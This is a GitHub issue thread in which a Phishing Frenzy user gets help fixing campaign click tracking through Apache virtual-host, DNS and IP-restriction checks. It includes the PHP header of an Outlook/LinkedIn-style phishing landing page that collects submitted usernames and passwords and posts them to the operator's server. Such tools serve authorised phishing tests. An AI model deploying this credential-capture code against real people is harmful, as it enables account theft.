Closed tj94 closed 8 years ago
Did you happen to change the URL / FQDN that you use to access the PF interface? Make sure that the "site url" within global settings is accurate to what URL you use to access PF.
Nothing changed. Except I forgot to mention that I created the same campaign again with the same information; it feels like that broke it, and so I deleted that campaign.
The site URL is the same, nothing changed in that, as for the fact that it is the same as what is used to access the PF interface. Thanks for the help.
That's likely your problem. You can't have 2 campaigns with the exact same FQDN. What happens is that only one of the campaigns will be able to collect stats, because Apache can only serve up one phishing site at a time per FQDN.
Hey, well, I figured that out the hard way, but that campaign was deleted then. Now there are two different campaigns with different FQDNs and stats still don't work. Is there anything that I need to delete or whatever? Please help, thanks.
I have created a new campaign and deleted the old one, and still it isn't tracking the stats, Brandon. Your help is really appreciated; any answers to this last question would be great!!!
First walk through these troubleshooting steps to see if you can manually create a click event: https://www.phishingfrenzy.com/resources/troubleshooting
Yes, the click event can be triggered manually, I have tried that.
Run apachectl -S and make sure that there are no unique FQDNs. The tracking API is working properly, you just need to figure out why clicks aren't being sent to the API properly.
```
apachectl -S
VirtualHost configuration:
*:80                   is a NameVirtualHost
         default server phishingfrenzy.local (/etc/apache2/pf.conf:6)
         port 80 namevhost phishingfrenzy.local (/etc/apache2/pf.conf:6)
         port 80 namevhost PhishingFrenzy.local (/etc/apache2/sites-enabled/000-default.conf:1)
         port 80 namevhost outlook.defendcontent.com (/etc/apache2/sites-enabled/6.conf:2)
                 alias outlook.defendcontent.com
         port 80 namevhost linkedin.defendcontent.com (/etc/apache2/sites-enabled/8.conf:2)
                 alias linkedin.defendcontent.com
ServerRoot: "/etc/apache2"
Main DocumentRoot: "/var/www"
Main ErrorLog: "/var/log/apache2/error.log"
Mutex watchdog-callback: using_defaults
Mutex ssl-stapling: using_defaults
Mutex ssl-cache: using_defaults
Mutex default: dir="/var/lock/apache2" mechanism=fcntl
Mutex mpm-accept: using_defaults
PidFile: "/var/run/apache2/apache2.pid"
Define: DUMP_VHOSTS
Define: DUMP_RUN_CFG
User: name="www-data" id=33
Group: name="www-data" id=33
```
This is what it looks like
So phishingfrenzy.local needs to be able to resolve on all the targets which click on the link. Do you have DNS or some other way that targets are able to resolve this to an IP address?
We have bought a domain - defendcontent.com - used to resolve to the PF box per se - I use goeasy.defendcontent.com to get into the PF interface. And all the subdomains like linkedin.defendcontent.com have been created with an A record.
OK, so you are using a valid domain with proper resolution. One thing to check is what the actual URL is within the phishing site itself. So you can see what directoryroot is configured within the 6.conf, for example, and look at your index.php file.
At the top portion of the file, look at the PHP tags and see if the URL is lining up properly to your PF interface.
Beginning looks like this:

```php
<?php
// Turn off all error reporting
error_reporting(0);

if (isset($_GET['uid'])) {
    $uid = $_GET['uid'];
} else {
    header('404 Not Found', true, 404);
    echo "404 Page Not Found";
    exit();
}

function get_ip() {
    if (function_exists('apache_request_headers')) {
        $headers = apache_request_headers();
    } else {
        $headers = $_SERVER;
    }
```
This is the specific line we are interested in. https://github.com/pentestgeek/phishing-frenzy/blob/master/app/views/reports/tags.txt.erb#L39
What you posted above isn't what we need.
Here...
```php
function get_ip() {
    if (function_exists('apache_request_headers')) {
        $headers = apache_request_headers();
    } else {
        $headers = $_SERVER;
    }
    if (array_key_exists('X-Forwarded-For', $headers) && filter_var($headers['X-Forwarded-For'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
        $the_ip = $headers['X-Forwarded-For'];
    } elseif (array_key_exists('HTTP_X_FORWARDED_FOR', $headers) && filter_var($headers['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {
        $the_ip = $headers['HTTP_X_FORWARDED_FOR'];
    } else {
        $the_ip = filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP, FILTER_FLAG_IPV4);
    }
    return $the_ip;
}

$password = htmlspecialchars($_POST['PasswordForm']);
$username = htmlspecialchars($_POST['UsernameForm']);

if ($password != '') {
    $creds = 'user:' . $username . ' password:' . $password;
}

$ip = get_ip();
$browser = $_SERVER['HTTP_USER_AGENT'];
$host = $_SERVER['HTTP_HOST'];
$url = "http://goeasy.defendcontent.com" . '/reports/results/';
$data = array('uid' => $uid, 'browser_info' => $browser, 'ip_address' => $ip, 'extra' => $creds);

// use key 'http' even if you send the request to https://...
$options = array(
    'http' => array(
        'header'  => 'Content-type: application/x-www-form-urlencoded',
        'method'  => 'POST',
        'content' => http_build_query($data),
    ),
);
$context = stream_context_create($options);
$result = file_get_contents($url, false, $context);
?>
```
If you said you tested a track event manually by using this FQDN http://goeasy.defendcontent.com/reports/results/ then everything should be working. The only thing I can think of is monitoring your PF logs while invoking the click to the phishing site. Logs would be located at /var/www/phishing-frenzy/logs/production.log if you're running your app in production mode.
OK, here is the thing: if I type http://goeasy.defendcontent.com/reports/results/?uid:UKIBFVKI in the address bar, it should trigger the event. Well, it does not; now it just displays "start," in the top left corner and that is it. I manually triggered the event using phishingfrenzy.local earlier, my bad.
Thanks for all your help.
I believe "start" is normal; however, it requires the user-agent and some other parameters, as stated in the documentation, to actually log it properly.
Also it should be ?uid=UKIBFVKI
Perhaps that is your issue with requiring specific IP addresses? You see the targets need to be able to access your PF API which is used as a callback to send tracking analytic data. If you are locking down that FQDN to only certain IP addresses that could be your issue.
Hey, being a rookie in Linux, I stopped Apache and then started it (I just wanted to see if that would help as well, as I deleted the requiring specific IP stuff from pf.conf). It didn't work; now all I see is the Apache page, no PF interface.
Look at the result of apachectl -S; it sounds like it's serving up the virtual host 000-default.conf.
Hey, got it back... thanks for the reply. Got everything working again.
Thanks for the help and the prompt reply!
I still feel that you restricting the IP addresses within apache to the PF interface is what is not allowing stats to track properly. Again, look at the application logs when you click on the phishing email and see what is happening.
Now you can close the ticket, and like I said in the last post, thanks for the help and the prompt reply. :)
No problem, hope you get it sorted out.
Everything was working, using the templates on GitHub - office365, LinkedIn. The office365 template had issues, but they were resolved. However, I tried to change the PF login password and it took me to a weird page stating URL not - contact your administrator. After going back a couple of windows, everything was back on and PF started working again. Then I changed the email settings in one of the campaigns, sent phishing emails again as a test, and realized it was not tracking stats. Now no stats work for any campaign. Please help with how to resolve this.